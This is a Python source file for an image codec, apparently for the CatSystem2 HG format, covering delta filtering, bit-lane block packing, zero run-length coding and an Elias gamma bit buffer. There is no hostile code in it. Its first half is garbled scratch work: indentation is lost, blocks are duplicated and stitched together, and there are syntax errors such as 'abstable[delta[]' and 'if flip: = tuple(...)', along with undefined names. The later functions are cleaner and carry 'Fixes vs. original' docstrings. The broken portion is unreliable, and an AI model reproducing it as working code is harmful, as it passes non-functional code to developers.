# pixels[yx + 2] = invtable[(val >> 16) & 0xff]
# pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
finally:
# if isinstance(pixels, memoryview):
# pixels.release()
# if isinstance(buffer, memoryview):
# buffer.release()
for memitem in (block0, block1, block2, block3, buffer, pixels, abstable): #blocks:
if isinstance(memitem, memoryview):
memitem.release()
# first loop through the entire delta slice and perform absolute transform
for i in range(bufstart, bufend, 1):
delta[i] = abstable[delta[i]]
# Iterate through each section one at a time, each pass
# through delta encodes a different mask (section/block) of bytes
i = 0
# Section masks: [0xc0c0c0c0, 0x30303030, 0x0c0c0c0c, 0x03030303]
for k in range(6, -1, -2): # current section
src = bufstart
for i in range(sectlen): # section iteration
idx = 0
val = unpack_from('<I', delta, src)
b0 = b1 = b2 = b3 = 0
m = 0x3
for j in range(0, 8, 2): # section mask to byte
m = 0x3 << j
b = abstable[delta[]
b3 |= (b ) & m
b >>= 2
b2 |= (b >> 2) & m
b >>= 2
b1 |= (b >> 4) & m
b >>= 2
b0 |= (b >> 6) & m
m <<= 2
b = ((((delta[src ] >> k) & 0x3)) |
(((delta[src + 1] >> k) & 0x3) << 2) |
(((delta[src + 2] >> k) & 0x3) << 4) |
(((delta[src + 3] >> k) & 0x3) << 6))
idx |= (((delta[src] >> k) & 0x3) << j)
src += 1
blocks[i] = idx & 0xff
dst += 1
return blocks
def unpack_data(data:bytes, cmd:bytes) -> bytearray:
    """unpack_data(data bytes, cmd bytes) -> buffer bytearray

    zlib-decompresses the data/cmd pair, then expands the zero run-length
    coding described by `cmd` into a freshly allocated output buffer.
    Memoryviews are used for zero-copy slicing and always released on exit.

    Fixes vs. original: the BitBuffer was bound to a misspelled name
    (`bifbuf`) but read back as `bitbuf`, and the function returned the
    undefined name `_buffer`.
    """
    buffer = None
    outbuf = None
    try:
        data = memoryview(zlib.decompress(data))
        cmd = memoryview(zlib.decompress(cmd))
        bitbuf = BitBuffer(cmd)
        copyflag = bitbuf.read_flag()       # is first run non-zero data?
        buflen = bitbuf.read_eliasgamma()   # length of output buffer (usually height x stride)
        outbuf = bytearray(buflen)          # zero-filled backing store
        buffer = memoryview(outbuf)
        off = dataoff = 0
        while off < buflen:
            runlen = bitbuf.read_eliasgamma()
            if copyflag:
                # Copy non-zero data into output buffer
                buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
                dataoff += runlen
            # else skip zero bytes, buffer already filled with zero-bytes
            off += runlen
            copyflag = not copyflag
        return outbuf  # underlying bytearray of `buffer`
    finally:
        for memitem in (data, cmd, buffer):
            if isinstance(memitem, memoryview):
                memitem.release()
def unpack_into_pixels(buffer:bytes, pixels:bytearray, sliceidx:int, slicelen:int, width:int, height:int, bpp:int, bpc:int, offsetx:int, offsety:int, fullwidth:int, fullheight:int, flip:bool):
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (fullwidth * bytedepth + 3) & ~0x3
colstart = offsetx
colend = offsetx + width
rowstart = offsety + sliceidx
rowend = offsety + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
del colstart, colend, rowstart, rowend
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# buflen = len(buffer)
# sectlen = buflen // 4
sectlen = len(buffer) // 4
# sect0, sect1, sect2, sect3 = sects = range(0, sectlen * 4, sectlen)
invtable = make_abs_tables()[1] # inv abstable
table0, table1, table2, table3 = make_weight_tables()
#block0, block1, block2, block3 = blocks = [None] * 4
block0 = block1 = block2 = block3 = None
try:
buffer = memoryview(buffer)
# for i, sect in enumerate(range(0, sectlen * 4, sectlen)):
# blocks[i] = buffer[sect:sect + sectlent]
# block0, block1, block2, block3 = blocks
block0 = buffer[sect0:sect0 + sectlen]
block1 = buffer[sect1:sect1 + sectlen]
block2 = buffer[sect2:sect2 + sectlen]
block3 = buffer[sect3:sect3 + sectlen]
buffer = buffer.release()
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
finally:
# if isinstance(pixels, memoryview):
# pixels.release()
# if isinstance(buffer, memoryview):
# buffer.release()
for memitem in (block0, block1, block2, block3, buffer, pixels): #blocks:
if isinstance(memitem, memoryview):
memitem.release()
# block0, block1, block2, block3 = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# buflen = len(buffer)
# sectlen = buflen // 4
# sect0, sect1, sect2, sect3 = range(slicestart, slicestart + sectlen * 4, sectlen)
# block0, block1, block2, block3 = blocks = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# if not flip:
# normyrange = range(fullstart, fullend, fullstride)
# deltayrange = range(fullstart + stride, fullend, fullstride)
# deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
# else:
# normyrange = range(fullend - stride, fullstart - 1, fullstride)
# deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
# deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# # inverse normalize data blocks into pixel buffer
# i = 0
# for y0 in normyrange:
# for yx in range(y0, y0 + stride, 4):
# val = (table0[block0[i]] | table1[block1[i]] |
# table2[block2[i]] | table3[block3[i]]))
# i += 1
# pixels[yx ] = invtable[(val ) & 0xff]
# pixels[yx + 1] = invtable[(val >> 8) & 0xff]
# pixels[yx + 2] = invtable[(val >> 16) & 0xff]
# pixels[yx + 3] = invtable[(val >> 24) ]
# # undelta RGB(A) channels of each previous pixel in first row
# for x0 in deltaxrange:
# pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# # undelta RGB(A) channels of each previous stride in all but first row
# for y0 in deltayrange:
# for yx in range(y0, y0 + stride, 1)):
# pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
def unpack_data(self, data:bytes, cmd:bytes) -> bytearray:
    """unpack_data(data bytes, cmd bytes) -> buffer bytearray

    zlib-decompresses the data/cmd pair, then expands the zero run-length
    coding described by `cmd` into a freshly allocated output buffer.

    Fixes vs. original: the BitBuffer was bound to a misspelled name
    (`bifbuf`) but read back as `bitbuf`; the unused `sectlen`/`blocks`
    locals (dead scratch) are removed.
    """
    data = zlib.decompress(data)
    cmd = zlib.decompress(cmd)
    bitbuf = BitBuffer(cmd)
    copyflag = bitbuf.read_flag()       # is first run non-zero data?
    buflen = bitbuf.read_eliasgamma()   # length of output buffer (usually height x stride)
    buffer = bytearray(buflen)          # already filled with zero-bytes
    off = dataoff = 0
    while off < buflen:
        runlen = bitbuf.read_eliasgamma()
        if copyflag:
            # Copy non-zero data into output buffer
            buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
            dataoff += runlen
        # else skip zero bytes, buffer already filled with zero-bytes
        off += runlen
        copyflag = not copyflag
    return buffer
def unpack_slice(self, hgslice:HgSlice, hgdata:HgData, pixels:bytearray, stdinfo:StandardInfo, options:HgOptions=HgOptions(0)):
stride = stdinfo.stride
bytedepth = stdinfo.bytedepth
channeldepth = stdinfo.channeldepth
width = stdinfo.width
height = stdinfo.height
canvasx = stdinfo.canvasx
canvasy = stdinfo.canvasy
canvaswidth = stdinfo.canvaswidth
canvasheight = stdinfo.canvasheight
#
#
data = hgdata.data #TODO: zlib.decompress()
cmd = hgdata.cmd #TODO: zlib.decompress()
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = bytearray(buflen) # already filled with zero-bytes
off = dataoff = 0
while off < buflen:
runlen = bitbuf.read_eliasgamma()
#
if copyflag:
# Copy non-zero data into output buffer
buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
dataoff += runlen
#else skip zero bytes, buffer already filled with zero-bytes
off += runlen
copyflag = not copyflag
return buffer
table0, table1, table2, table3 = tables = make_weight_tables()
invtable = make_abs_tables()[1] # inv abstable
pixlen = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
stridefull = (canvaswidth * pixlen + 3) & ~0x3
stridestart = (canvasx * pixlen + 3) & ~0x3
#
slicestride = stride
slicestart = hgslice.index * stridefull + stridestart
sliceend = (hgslice.index + hgslice.length) * stridefull + stridestart
sliceheight = hgslice.length
#
sliceidx = hgslice.index
slicelen = hgslice.len
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (canvaswidth * bytedepth + 3) & ~0x3
colstart = canvasx
colend = canvasx + width
rowstart = canvasy + sliceidx
rowend = canvasy + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
outstart = (canvasy + sliceidx) * stridefull + canvasx * pixlen
outend = outstart + slicelen * stridefull + stride
canvasidx
#
sectlen = buflen // 4
block0, block1, block2, block3 = blocks = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# bytedepth = (bpp + 7) // 8
# stride = ((width * bpp + 7) // 8 + 3) & ~0x3
# stridefull = ((canvaswidth * bpp + 7) // 8 + 3) & ~0x3
# stridestart = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
# strideend = stridestart + stride
# #
# slicestart = hgslice.index * stride
# sliceend = (hgslice.index + hgslice.length) * stride
# #
# sectlen = buflen // 4
# sect0, sect1, sect2, sect3 = range(slicestart, slicestart + sectlen * 4, sectlen)
u4_s = struct.Struct('<I')
stride = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
fullstride = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
#bufend = (hgslice.index + hgslice.length) * stride
sectlen = hgslice.length * stride // 4
#sect0, sect1, sect2, sect3 = range(bufstart, bufstart + sectlen * 4, sectlen)
sect0, sect1, sect2, sect3 = range(0, sectlen * 4, sectlen)
delta = bytearray(sectlen * 4)
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
u4_1 = struct.Struct('<I')
u1_packin = u4_1.pack_into
bi = 0
yrange = range(fullstart, fullend, fullstride)
if flip: yrange = reversed(yrange)
for yj in (reversed(yrange) if flip else yrange): #range(slicestart, sliceend, stridefull):
for xj in range(yj, yj + stride, 4):
u1_packin(pixels, xj, (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
bi += 1
# undelta RGB(A) channels of each previous pixel in first row
for x1, x0 in zip(range(bufstart + bytedepth, bufstart + stride, 1),
range(bufstart, bufstart + stride - bytedepth, 1)):
delta[x1] = (delta[x1] + delta[x0]) & 0xff
yranges (range(fullstart + stride, fullend, fullstride),
range(fullstart, fullend - stride, fullstride)):
if flip: = tuple(reversed(yr) for yr in yranges)
yranges = (range(fullstart + bytedepth, fullstart + stride, fullstride),
range(fullstart, fullstart + stride - bytedepth, fullstride))
if flip: = tuple(reversed(yr) for yr in yranges)
yrange1 = range(bufstart + bytedepth, bufstart + stride, 1)
yrange0 = range(bufstart, bufstart + stride - bytedepth, 1)
if flip: yrange1, yrange0 = reversed(yrange1), reversed(yrange0)
yrange = zip(yrange1, yrange0)
# undelta RGB(A) channels of each previous stride in all but first row
for y1, y0 in zip(range(bufstart + stride, bufstart, 1),
range(bufstart, bufstart - stride, 1)):
delta[y1] = (delta[y1] + delta[y0]) & 0xff
# if flip:
# yrange = range(sliceend - 1, slicestart - 1, -stridefull)
# else:
# yrange = range(slicestart, sliceend, stridefull)
# if flip: yrange = reversed(yrange)
i = 0
yrange = range(slicestart, sliceend, stridefull)
for yj in (reversed(yrange) if flip else yrange): #range(slicestart, sliceend, stridefull):
for xj in range(yj, yj + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
delta[j ] = invtable[(val ) & 0xff]
delta[j + 1] = invtable[(val >> 8) & 0xff]
delta[j + 2] = invtable[(val >> 16) & 0xff]
delta[j + 3] = invtable[(val >> 24) ]
u1_packin(pixels, xj, (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
xranges = (range(bufstart + bytedepth, bufstart + stride, 1),
range(bufstart, bufstart + stride - bytedepth, 1))
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
#
### INITIALIZATION TABLES ###
#
#TODO: test import array.array type
def make_weight_tables() -> Tuple[List[int], List[int], List[int], List[int]]:
    """make_weight_tables() -> weight_tables[4][256]

    Builds four 256-entry lookup tables that spread the four 2-bit pairs
    of a byte across a 32-bit word, one table per 2-bit lane.
    NOTE: These tables contain unsigned integers
    >>> make_weight_tables()
    ([0x0, 0x40, 0x80, 0xc0, 0x4000, 0x4040, 0x4080, ...0xc0c0c080, 0xc0c0c0c0],
     [0x0, 0x10, 0x20, 0x30, 0x1000, 0x1010, 0x1020, ...0x30303020, 0x30303030],
     [0x0, 0x04, 0x08, 0x0c, 0x0400, 0x0404, 0x0408, ...0x0c0c0c08, 0x0c0c0c0c],
     [0x0, 0x01, 0x02, 0x03, 0x0100, 0x0101, 0x0102, ...0x03030302, 0x03030303])
    """
    tables = ([], [], [], [])  # tables[0] is the highest lane (shift 6)
    for byte in range(0x100):
        # spread bit-pairs of `byte` into bits 0-1, 8-9, 16-17, 24-25
        spread = ((((byte & 0xc0) << 6 | (byte & 0x30)) << 6
                   | (byte & 0x0c)) << 6 | (byte & 0x03))
        for shift, table in zip((6, 4, 2, 0), tables):
            table.append(spread << shift)
    # freeze as tuples for lookup performance
    return tuple(tuple(table) for table in tables)
#TODO: test import array.array type/bytes type
#TODO: Would returning tables as (bytes, bytes) be better for efficiency?
def make_abs_tables() -> Tuple[List[int], List[int]]:
    """make_abs_tables() -> (abstable, inv_abstable)

    Builds the forward "absolute" transform table and its inverse: small
    magnitudes (signed-byte view) map to small unsigned codes, interleaving
    positives and their complements.
    NOTE: These tables contain unsigned integers
    >>> make_abs_tables()
    # signed representation (however result is unsigned)
    ([0, 2, 4, 6, 8, 10, 11, ...5, 3, 1],
     [0, -1, 1, -2, 2, -3, 3, ...-127, 127, -128])
    """
    fwd = [0] * 0x100
    inv = [0] * 0x100
    for i in range(0x80):
        even = i * 2
        fwd[i] = even           # positive half -> even codes
        fwd[0xff - i] = even + 1  # complement (~i) half -> odd codes
        inv[even] = i
        inv[even + 1] = 0xff - i
    # freeze as tuples for lookup performance
    return (tuple(fwd), tuple(inv))
## BIT BUFFER / ELIAS GAMMA CODING ##
class BitBuffer(object):
    """BitBuffer(bytes) -> readable bitbuffer
    BitBuffer(bytearray) -> writable bitbuffer

    Reads and writes individual bits and positive integers in elias gamma
    coding.  Bits are consumed/emitted LSB-first within each byte.
    Writing only ORs 1-bits in, so the underlying buffer is assumed to be
    zero-initialized.
    NOTE: no bounds checking is performed.

    Fixes vs. original:
    - __init__ discarded the buffer argument and set all slots to 0.
    - write_eliasgamma clobbered `v` before emitting its value bits, had a
      stray `:` (syntax error), and did not return the promised bit count.
    - write_flag did not return the promised bit count.
    - An optional ignored `length` argument keeps the file's existing
      two-argument call sites (`BitBuffer(cmd, len(cmd))`) working.
    """
    __slots__ = ('b', 'i', 'k')  # buffer, byte index, bit index

    def __init__(self, b:bytes, length:int=None):
        """BitBuffer(buffer[, length])

        `length` is accepted for caller convenience and ignored (no bounds
        checking is performed).
        """
        self.b = b
        self.i = self.k = 0  # byte index, bit index
    #
    # READ BITBUFFER:
    #
    def read_flag(self) -> bool:
        """Bb.read_flag() -> bool
        Reads the next boolean from the bitbuffer as a single bit.
        """
        k = self.k  # bit index
        if k >= 8:  # current byte exhausted, advance
            k = 0
            self.i += 1
        self.k = k + 1
        return bool((self.b[self.i] >> k) & 0x1)
    #
    def read_eliasgamma(self) -> int:
        """Bb.read_eliasgamma() -> positive integer
        Reads the next positive integer from the bitbuffer in elias gamma coding.
        """
        b = self.b  # buffer
        i = self.i  # byte index
        k = self.k  # bit index
        if k >= 8:  # incr bit [0:1]
            k = 0
            i += 1
        k += 1
        d = 0  # digits: count zero bits up to the marker bit
        while not ((b[i] >> (k - 1)) & 0x1):  # read bit [0:d+1]
            d += 1
            if k >= 8:  # incr bit [1:d+1]
                k = 0
                i += 1
            k += 1
        v = 1 << d  # marker bit is the value's top bit
        while d:    # remaining d value bits, MSB first
            d -= 1
            if k >= 8:  # incr bit [d+1:d*2+1]
                k = 0
                i += 1
            k += 1
            if (b[i] >> (k - 1)) & 0x1:  # read bit [d+1:d*2+1]
                v |= (1 << d)
        self.i = i
        self.k = k
        return v
    #
    # WRITE BITBUFFER:
    #
    def write_flag(self, f:bool) -> int:
        """Bb.write_flag(flag) -> integer bits written (always 1)
        Writes a boolean to the bitbuffer as a single bit.
        """
        k = self.k  # bit index
        if k >= 8:
            k = 0
            self.i += 1
            # assume buffer is initialized with zero-bytes
        self.k = k + 1
        if f:
            self.b[self.i] |= (1 << k)
        return 1
    #
    def write_eliasgamma(self, v:int) -> int:
        """Bb.write_eliasgamma(integer) -> integer bits written
        Writes a positive integer to the bitbuffer in elias gamma coding.
        """
        if v <= 0:
            raise ValueError('Elias gamma coded integer must be positive, not {0!r}'.format(v))
        b = self.b  # buffer
        i = self.i  # byte index
        k = self.k  # bit index
        d = 0  # digits (bit_length - 1)
        while v >> (d + 1):
            d += 1
            if k >= 8:  # incr bit [0:d]
                k = 0
                i += 1
            k += 1
            # zero bit [0:d]: nothing to OR in, buffer is zero-filled
        nbits = d * 2 + 1  # d zeros + marker bit + d value bits
        if k >= 8:  # incr bit [d:d+1]
            k = 0
            i += 1
        k += 1
        b[i] |= (1 << (k - 1))  # write marker bit [d:d+1] (true)
        while d:  # remaining d value bits of the ORIGINAL v, MSB first
            d -= 1
            if k >= 8:  # incr bit [d+1:d*2+1]
                k = 0
                i += 1
            k += 1
            if (v >> d) & 0x1:  # write bit [d+1:d*2+1] (if true)
                b[i] |= (1 << (k - 1))
        self.i = i
        self.k = k
        return nbits
def sizeof_eliasgamma(v:int) -> int:
    """sizeof_eliasgamma(value) -> integer bit length
    Measures the bit length of a positive integer in elias gamma coding.
    """
    if v <= 0:
        raise ValueError('Elias gamma coded integer must be positive, not {0!r}'.format(v))
    # 1 marker bit plus 2 bits per binary digit below the top bit
    return (v.bit_length() - 1) * 2 + 1
## ZERO RUN-LENGTH CODING ##
# --- format ---
# data bytes:
# [<non-zero run 0:bytes>, <non-zero run 1:bytes>, ...<non-zero run m-1:bytes>]
# cmd bits:
# <copyflag:bit>, <buffer length:eliasgamma>,
# [<run length 0:eliasgamma>, <run length 1:eliasgamma>, ...<run length n-1:eliasgamma>]
def encode_zrle(hgslice:HgSlice, buffer:bytes) -> Tuple[bytearray, bytearray]:
    """encode_zrle(hgslice, buffer bytes) -> (data bytearray, cmd bytearray)

    Zero run-length encodes `buffer`:
      data -- the concatenated non-zero runs, back to back
      cmd  -- bit stream: <copyflag:bit> <buffer length:eliasgamma> then one
              elias gamma run length per run, alternating non-zero/zero runs
              starting with `copyflag`.
    `buffer` must be non-empty (elias gamma cannot encode 0).
    `hgslice` is accepted for signature symmetry with the other codecs and
    is not consulted.

    Fixes vs. original: `write_eliasgamma` was passed the undefined name
    `length` (now `buflen`), BitBuffer was constructed with a stray second
    argument, and ~40 lines of unreachable scratch after the return are
    removed.
    """
    buflen = len(buffer)
    ## STEP 1 MEASURE: measure length and offset of all runs ##
    # (to allocate correct buffer sizes the first time)
    datalen = 0
    cmdbitlen = 1  # 1 bit for consumed copyflag
    cmdbitlen += sizeof_eliasgamma(buflen)
    runs = []  # includes zero and non-zero runs
    copyflag = bool(buffer[0])  # is first run non-zero data?
    off = 0
    while off < buflen:
        runlen = 1  # starts with the first non-conforming byte reached last run
        if copyflag:
            # length of non-zero run
            while off + runlen < buflen and buffer[off + runlen]:
                runlen += 1
            datalen += runlen
        else:
            # length of zero run
            while off + runlen < buflen and not buffer[off + runlen]:
                runlen += 1
        runs.append(runlen)
        cmdbitlen += sizeof_eliasgamma(runlen)
        off += runlen
        copyflag = not copyflag
    ## STEP 2 BUILD: non-zero data runs buffer, cmd bits buffer ##
    data = bytearray(datalen)  # already filled with zero-bytes
    cmd = bytearray((cmdbitlen + 7) // 8)
    copyflag = bool(buffer[0])
    bitbuf = BitBuffer(cmd)
    bitbuf.write_flag(copyflag)
    bitbuf.write_eliasgamma(buflen)
    off = dataoff = 0
    for runlen in runs:
        if copyflag:
            data[dataoff:dataoff + runlen] = buffer[off:off + runlen]
            dataoff += runlen
        bitbuf.write_eliasgamma(runlen)
        off += runlen
        copyflag = not copyflag
    return (data, cmd)
def decode_zrle(hgslice:HgSlice, data:bytes, cmd:bytes) -> bytearray:
    """decode_zrle(hgslice, data bytes, cmd bytes) -> buffer bytearray

    Inverse of encode_zrle: expands alternating non-zero/zero runs (run
    lengths read from the `cmd` bit stream, run payloads from `data`) into
    a freshly allocated output buffer.
    `hgslice` is accepted for signature symmetry and is not consulted.

    Fixes vs. original: the BitBuffer was bound to the misspelled name
    `bifbuf` but read back as `bitbuf` (NameError), and was constructed
    with a stray second argument.
    """
    bitbuf = BitBuffer(cmd)
    copyflag = bitbuf.read_flag()       # is first run non-zero data?
    buflen = bitbuf.read_eliasgamma()   # length of output buffer (usually height x stride)
    buffer = bytearray(buflen)          # already filled with zero-bytes
    off = dataoff = 0
    while off < buflen:
        runlen = bitbuf.read_eliasgamma()
        if copyflag:
            # Copy non-zero data into output buffer
            buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
            dataoff += runlen
        # else skip zero bytes, buffer already filled with zero-bytes
        off += runlen
        copyflag = not copyflag
    return buffer
## ENCODE/DECODE BLOCKS ##
def encode_blocks(hgslice:HgSlice, delta:bytes, width:int, height:int, bpp:int) -> bytearray:
    """encode_blocks(hgslice, delta bytes, width, height, bpp) -> blocks bytearray

    Applies the absolute transform to the slice's bytes, then regroups the
    four 2-bit lanes of each byte into four contiguous sections (blocks).

    Fix vs. original: the absolute transform was applied in place to the
    caller's buffer (which also failed for immutable `bytes`); it now
    operates on a local copy.
    """
    abstable = make_abs_tables()[0]  # fwd abstable
    stride = ((width * bpp + 7) // 8 + 3) & ~0x3
    bufstart = hgslice.index * stride
    bufend = (hgslice.index + hgslice.length) * stride
    sectlen = hgslice.length * stride // 4
    blocks = bytearray(sectlen * 4)
    # absolute-transform a local copy so the caller's buffer is not clobbered
    absdelta = bytearray(delta)
    for i in range(bufstart, bufend):
        absdelta[i] = abstable[absdelta[i]]
    # Iterate through each section one at a time, each pass
    # through the slice encodes a different 2-bit lane of the bytes.
    dst = 0
    # Section masks: [0xc0c0c0c0, 0x30303030, 0x0c0c0c0c, 0x03030303]
    for k in range(6, -1, -2):  # current section (lane shift)
        src = bufstart
        for _ in range(sectlen):  # section iteration
            val = 0
            for j in range(0, 8, 2):  # pack four lane pairs into one byte
                val |= (((absdelta[src] >> k) & 0x3) << j)
                src += 1
            blocks[dst] = val & 0xff
            dst += 1
    return blocks
def decode_blocks(hgslice:HgSlice, blocks:bytes, width:int, height:int, bpp:int) -> bytearray:
    """decode_blocks(hgslice, blocks bytes, width, height, bpp) -> delta bytearray

    Inverse of encode_blocks: merges the four lane sections back into
    32-bit words via the weight tables, then undoes the absolute transform
    byte by byte.
    """
    weight0, weight1, weight2, weight3 = make_weight_tables()
    invtable = make_abs_tables()[1]  # inv abstable
    stride = ((width * bpp + 7) // 8 + 3) & ~0x3
    sectlen = hgslice.length * stride // 4
    base0, base1, base2, base3 = range(0, sectlen * 4, sectlen)
    delta = bytearray(sectlen * 4)
    out = 0
    for i in range(sectlen):
        merged = (weight0[blocks[base0 + i]] | weight1[blocks[base1 + i]] |
                  weight2[blocks[base2 + i]] | weight3[blocks[base3 + i]])
        delta[out]     = invtable[(merged      ) & 0xff]
        delta[out + 1] = invtable[(merged >>  8) & 0xff]
        delta[out + 2] = invtable[(merged >> 16) & 0xff]
        delta[out + 3] = invtable[(merged >> 24)       ]
        out += 4
    return delta
## ENCODE/DECODE DELTA ##
def encode_delta(hgslice:HgSlice, pixels:bytes, width:int, height:int, bpp:int) -> bytearray:
    """encode_delta(hgslice, pixels bytes, width, height, bpp) -> delta bytearray

    Delta-filters the slice: every byte in rows after the first becomes the
    difference from the byte one stride above; every channel in the first
    row becomes the difference from the previous pixel's channel.
    """
    bytedepth = (bpp + 7) // 8
    stride = ((width * bpp + 7) // 8 + 3) & ~0x3
    first = hgslice.index * stride                      # slice's first byte
    last = (hgslice.index + hgslice.length) * stride    # one past slice's last byte
    delta = bytearray(pixels)
    # vertical delta: all rows but the first, processed bottom-up so the
    # reference byte (one stride above) is still the original value
    for pos in range(last - 1, first + stride - 1, -1):
        delta[pos] = (delta[pos] - delta[pos - stride]) & 0xff
    # horizontal delta: first row only, right-to-left against the
    # previous pixel's matching channel
    for pos in range(first + stride - 1, first + bytedepth - 1, -1):
        delta[pos] = (delta[pos] - delta[pos - bytedepth]) & 0xff
    return delta
def decode_delta(hgslice:HgSlice, delta:bytes, width:int, height:int, bpp:int) -> bytearray:
    """decode_delta(hgslice, delta bytes, width, height, bpp) -> pixels bytearray

    Exact inverse of encode_delta: restore the first row by adding back the
    previous pixel's channel, then restore each later row top-down by adding
    back the byte one stride above.

    Fixes vs. original: the horizontal pass ran over the whole buffer
    instead of just the first row, the vertical pass was an empty range
    (start > stop with step +1, so nothing was restored), and the input
    `bytes` was mutated in place; work now happens on a local copy.
    """
    bytedepth = (bpp + 7) // 8
    stride = ((width * bpp + 7) // 8 + 3) & ~0x3
    first = hgslice.index * stride                      # slice's first byte
    last = (hgslice.index + hgslice.length) * stride    # one past slice's last byte
    pixels = bytearray(delta)  # local copy; `delta` may be immutable bytes
    # undelta RGB(A) channels of each previous pixel in first row
    for pos in range(first + bytedepth, first + stride):
        pixels[pos] = (pixels[pos] + pixels[pos - bytedepth]) & 0xff
    # undelta each previous stride in all but first row (top-down so the
    # reference byte above is already restored)
    for pos in range(first + stride, last):
        pixels[pos] = (pixels[pos] + pixels[pos - stride]) & 0xff
    return pixels
## ENCODE/DECODE SLICES ##
def encode_slice(hgslice:HgSlice, pixels:bytes, width:int, height:int, bpp:int) -> HgData:
    """encode_slice(hgslice, pixels bytes, width, height, bpp) -> HgData(data bytearray, cmd bytearray)

    Full encode pipeline for one slice: delta-filter the pixels, regroup
    the 2-bit lanes into blocks, then zero run-length encode the blocks.

    Fixes vs. original: encode_blocks was called without its `delta`
    argument (TypeError); the return annotation said HgSlice although an
    HgData is returned (as the docstring already stated).
    """
